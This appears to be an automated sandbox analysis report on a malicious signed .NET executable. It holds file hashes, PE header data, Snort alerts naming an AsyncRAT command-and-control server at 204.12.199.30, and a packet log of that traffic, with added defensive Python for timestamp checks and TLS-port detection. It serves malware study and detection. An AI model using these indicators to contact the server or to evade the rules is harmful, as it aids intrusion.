                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neu
                Process:C:\Users\user\Desktop\EGSh5caf8a.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):93896
                Entropy (8bit):6.397214733539755
                Encrypted:false
                SSDEEP:1536:qoJFOWbLXbbetrgpFZ2nrWLtyEclopV4c78eiV:zFOWbLLbetrgQn6BpVD34
                MD5:712940BAEF78C821E36B8701BF073C52
                SHA1:D59896B87424FAFC0D00AB5E5C2019BD941167CE
                SHA-256:08F8498AEC75418BB4C12972A6547EE2C4762160E7BF36C558A91B7B9110ED3F
                SHA-512:68BC6DF413E00E6420EE6DB6E4D0497BAB61908B96F48FDB6BF6AAE9BED72DE840D83DFC0017DD24995A05F29B415B82852F84E9B74DE85D303B67CC396C7007
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 50%
                • Antivirus: Virustotal, Detection: 54%, Browse
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ry...............0..2...........Q... ........@.. ..............................fK....`..................................P..K....`...............F...(...........P............................................... ............... ..H............text....1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............D..............@..B.................P......H........6...............+..`............................................(....*.~....%-.&~..........s....%.....s....%.o....o....*....0..........~....(....(....o.....~.....(....,..*~....(....,..*~....(....-.~....(....o.....(.....i~....X......~.....o.....~....(....~....(.....*..0..I.......(.......+....o....(......X....i2.~......o....%(....s....(.....,.(.......*....0..K.......(....%o.....o....(.....~....(......~.....~...._(....&.~........~....(....&*.(.....1.(....(....(....&(...
                Process:C:\Users\user\Desktop\EGSh5caf8a.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:false
                Preview:[ZoneTransfer]....ZoneId=0
                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Entropy (8bit):6.397214733539755
                TrID:
                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                • Win32 Executable (generic) a (10002005/4) 49.97%
                • Generic Win/DOS Executable (2004/3) 0.01%
                • DOS Executable Generic (2002/1) 0.01%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:EGSh5caf8a.exe
                File size:93'896 bytes
                MD5:712940baef78c821e36b8701bf073c52
                SHA1:d59896b87424fafc0d00ab5e5c2019bd941167ce
                SHA256:08f8498aec75418bb4c12972a6547ee2c4762160e7bf36c558a91b7b9110ed3f
                SHA512:68bc6df413e00e6420ee6db6e4d0497bab61908b96f48fdb6bf6aae9bed72de840d83dfc0017dd24995a05f29b415b82852f84e9b74de85d303b67cc396c7007
                SSDEEP:1536:qoJFOWbLXbbetrgpFZ2nrWLtyEclopV4c78eiV:zFOWbLLbetrgQn6BpVD34
                TLSH:D293B4788F89D526F3958CF891F2D69FD4BDA674191AC472EABF89ACC35C7842D12003
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....ry...............0..2...........Q... ........@.. ..............................fK....`................................
                Icon Hash:f08c92a8e8f0b245
                Entrypoint:0x40510e
                Entrypoint Section:.text
                Digitally signed:true
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0xBC79720B [Sat Mar 15 02:20:59 2070 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                Signature Valid:true
                Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                Signature Validation Error:The operation completed successfully
                Error Number:0
Not Before:18/03/2024 01:00:00
Not After:18/04/2025 01:59:59
                Subject Chain
                • CN=Munish Walia, O=Munish Walia, S=Punjab, C=IN
                Version:3
                Thumbprint MD5:84620E59BCC75E9243C975DCBA4F8685
                Thumbprint SHA-1:5A168F8DEFECA0DF26C330937FAF04A2BE34D879
                Thumbprint SHA-256:5B799ED539CADF85859FA8553349A3985E208EC4438836CE1CEA228FFC6CD61A
                Serial:786E6B5A7F502A65A479D72822A8B2B7
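The COFF TimeDateStamp 0xBC79720B above decodes to 15 March 2070, later than both the analysis date and the signing certificate's validity window, which is what the "Binary contains a suspicious time stamp" signature keys on. The Python below is an added example, not code from the report, that reads the field straight out of a PE header and classifies it against the observation time and an assumed floor (a .NET 4 assembly cannot predate the 4.0 runtime, which shipped in April 2010). The header it parses is a constructed stub carrying this report's value, not the sample itself.

```python
import struct
from datetime import datetime, timedelta, timezone
from typing import Tuple

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)

# When this report's analysis started (11:36:10 +02:00 on 2024-04-19).
ANALYSIS_TIME = datetime(2024, 4, 19, 9, 36, 10, tzinfo=timezone.utc)
# Assumed floor for a .NET 4 assembly: nothing targeting the 4.0 runtime can
# have been linked before that runtime shipped.
DOTNET4_FLOOR = datetime(2010, 4, 12, tzinfo=timezone.utc)


def coff_timestamp(pe: bytes) -> int:
    """Read IMAGE_FILE_HEADER.TimeDateStamp from a PE image held in memory."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    # COFF header follows the signature: Machine(2) NumberOfSections(2) TimeDateStamp(4) ...
    return struct.unpack_from("<I", pe, e_lfanew + 8)[0]


def assess_timestamp(ts: int, observed: datetime, floor: datetime) -> Tuple[str, datetime]:
    """Classify a link timestamp as 'future', 'too_old' or 'plausible' relative to
    the time the file was observed and the earliest date it could have been built."""
    built = EPOCH + timedelta(seconds=ts)   # avoids platform limits in fromtimestamp()
    if built > observed:
        return "future", built
    if built < floor:
        return "too_old", built
    return "plausible", built


def build_stub_pe(timestamp: int) -> bytes:
    """Constructed minimal MZ header + PE signature + COFF header (not a loadable
    image), just enough for coff_timestamp() to parse. Machine, section count and
    characteristics mirror the values this report shows for the sample."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x014C, 3, timestamp, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + coff


if __name__ == "__main__":
    stub = build_stub_pe(0xBC79720B)           # the value in this report
    ts = coff_timestamp(stub)
    verdict, built = assess_timestamp(ts, ANALYSIS_TIME, DOTNET4_FLOOR)
    print(f"TimeDateStamp 0x{ts:08X} -> {built:%Y-%m-%d %H:%M:%S} UTC: {verdict}")
```

Treat a future-dated stamp as weak evidence on its own: compilers that emit deterministic builds (Roslyn with /deterministic, the default for SDK-style .NET projects) replace the field with a content hash, so legitimately signed .NET binaries show nonsense dates too. The Authenticode signature and the certificate's Not Before date are the stronger anchors for when the file actually existed.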
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the previous instruction repeats 97 times: the bytes after the entry stub are zero padding, which decodes as add byte ptr [eax], al; the jmp itself goes through the IAT slot at 0x402000, i.e. mscoree.dll!_CorExeMain, the standard .NET executable entry)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x50c0 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x10fdc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x14600 | 0x28c8 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x18000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x50a4 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x3114 | 0x3200 | 7f9e56ab8be5e3e8b1df38e8be9386cb | False | 0.63578125 | SysEx File - Matsushita | 6.283552590397781 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x6000 | 0x10fdc | 0x11000 | 8cc48e06119181d11f1f5d5c28eafd2d | False | 0.17637005974264705 | data | 5.9140904081711705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x18000 | 0xc | 0x200 | 36739f2453b766ee5dd5064c822ef55b | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x6100 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.16868271619543357
RT_GROUP_ICON | 0x16938 | 0x14 | data | | | 1.15
RT_VERSION | 0x1695c | 0x3ec | data | | | 0.3844621513944223
RT_MANIFEST | 0x16d58 | 0x27f | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.4647887323943662
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/19/24-11:37:15.963600 | TCP | 2030673 | ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) | 8808 | 49710 | 204.12.199.30 | 192.168.2.7
04/19/24-11:37:15.963600 | TCP | 2035595 | ET TROJAN Generic AsyncRAT Style SSL Cert | 8808 | 49710 | 204.12.199.30 | 192.168.2.7
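Both Snort rules above match on the server's certificate, so they need the TLS handshake to reach the Certificate message before they fire. The Python below is an added example, not from the report or the ET ruleset, showing the two cheaper heuristics that the report's own signatures describe ("Uses known network protocols on non-standard ports" and "Connects to many ports of the same IP"): recognise a TLS ClientHello from the first bytes a client sends, and count distinct non-standard destination ports per host. The connection records are constructed; the C2 address and the ports 20991 and 8808 are the ones in this report, while the 192.0.2.10 entries are made-up benign traffic, and the port sets are this example's own choices.

```python
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Ports where a TLS handshake is unremarkable; TLS to anything else is worth a look.
TLS_STANDARD_PORTS = {443, 465, 636, 853, 993, 995, 8443}
# Ports that almost every host gets contacted on; not counted toward the multi-port signal.
COMMON_PORTS = {53, 80, 123, 443, 8080, 8443}

Conn = Tuple[str, int, bytes]   # (dst_ip, dst_port, first payload the client sent)


def looks_like_tls_client_hello(payload: bytes) -> bool:
    """True if a client's first bytes are a TLS handshake record (content type 0x16,
    version 3.x) whose body starts with a ClientHello (handshake type 0x01)."""
    if len(payload) < 6:
        return False
    record_type, ver_major, ver_minor = payload[0], payload[1], payload[2]
    handshake_type = payload[5]
    return (record_type == 0x16 and ver_major == 0x03
            and ver_minor <= 0x03 and handshake_type == 0x01)


def flag_connections(conns: List[Conn]) -> Tuple[List[Tuple[str, int]], Dict[str, List[int]]]:
    """Return (TLS-on-non-standard-port hits, hosts contacted on more than one uncommon port)."""
    ports_by_host: Dict[str, Set[int]] = defaultdict(set)
    tls_odd_port: List[Tuple[str, int]] = []
    for dst_ip, dst_port, payload in conns:
        if dst_port not in COMMON_PORTS:
            ports_by_host[dst_ip].add(dst_port)
        if looks_like_tls_client_hello(payload) and dst_port not in TLS_STANDARD_PORTS:
            tls_odd_port.append((dst_ip, dst_port))
    multi_port = {ip: sorted(ports) for ip, ports in ports_by_host.items() if len(ports) > 1}
    return tls_odd_port, multi_port


# Constructed prefix of a TLS ClientHello: record header (type 0x16, version 3.1,
# length), handshake header (type 0x01, length), then client_version 3.3.
CLIENT_HELLO_PREFIX = bytes.fromhex("160301 00f5 01 0000f1 0303")

SAMPLE_CONNECTIONS: List[Conn] = [
    ("204.12.199.30", 20991, CLIENT_HELLO_PREFIX),   # C2 port seen in this report
    ("204.12.199.30", 8808, CLIENT_HELLO_PREFIX),    # second C2 port seen in this report
    ("192.0.2.10", 443, CLIENT_HELLO_PREFIX),         # made-up benign HTTPS
    ("192.0.2.10", 80, b"GET / HTTP/1.1\r\nHost: example\r\n\r\n"),  # made-up plain HTTP
]

if __name__ == "__main__":
    odd, multi = flag_connections(SAMPLE_CONNECTIONS)
    for ip, port in odd:
        print(f"TLS on non-standard port: {ip}:{port}")
    for ip, ports in multi.items():
        print(f"{ip} contacted on {len(ports)} uncommon ports: {ports}")
```

The ClientHello check needs only the first six bytes of the client's first segment, so it works on a truncated capture or a flow record that keeps an initial payload snippet; it cannot tell an AsyncRAT server from any other TLS endpoint, which is why the certificate rules above remain the higher-confidence signal.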
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 19, 2024 11:37:07.701522112 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.834212065 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.834311962 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.834968090 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.981703997 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982209921 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982268095 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982284069 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982301950 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982320070 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982340097 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982340097 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982340097 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982347965 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982352018 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982386112 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982399940 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982400894 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982410908 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982439995 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982439995 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982470989 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982489109 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982507944 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982507944 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982525110 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982533932 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982539892 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982551098 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982557058 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982573032 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982573986 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982584000 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982590914 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:07.982598066 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982621908 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:07.982634068 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.114850998 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.114885092 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.114903927 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.114921093 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.114936113 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.115041971 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.115088940 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.115092039 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.115151882 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.120349884 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.212794065 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.253525972 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.253576040 CEST | 20991 | 49708 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.253650904 CEST | 49708 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.345808983 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.345896959 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.346025944 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.495069027 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.495799065 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.495817900 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.495834112 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.495857000 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.495873928 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.495898008 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.495898008 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.495903015 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.495919943 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.495929956 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.495945930 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.495964050 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.496026039 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.496041059 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.496056080 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.496063948 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.496078014 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.496087074 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.496093988 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.496123075 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.496141911 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.496141911 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.496151924 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.496170044 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.496171951 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.496207952 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.496226072 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.496243954 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.496260881 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.496263981 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.496280909 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.496299028 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.627788067 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.627815008 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.627834082 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.627868891 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.627906084 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.627919912 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.627937078 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.627973080 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.628004074 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.628021002 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.628036022 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.628052950 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.628061056 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.628071070 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.628092051 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.628092051 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.628139973 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.628155947 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.628175020 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.628180981 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.628212929 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.628218889 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.628249884 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.628307104 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.628319979 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.759912014 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.759937048 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.759953976 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.759964943 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.759979010 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.760025024 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.760042906 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.760042906 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.760056973 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.760143995 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.760171890 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.760190010 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.760207891 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.760215998 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.760226011 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.760250092 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.760266066 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.891976118 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.892004013 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.892066956 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.892132044 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.892165899 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
Apr 19, 2024 11:37:08.892174006 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.892213106 CEST | 20991 | 49709 | 204.12.199.30 | 192.168.2.7
Apr 19, 2024 11:37:08.892235994 CEST | 49709 | 20991 | 192.168.2.7 | 204.12.199.30
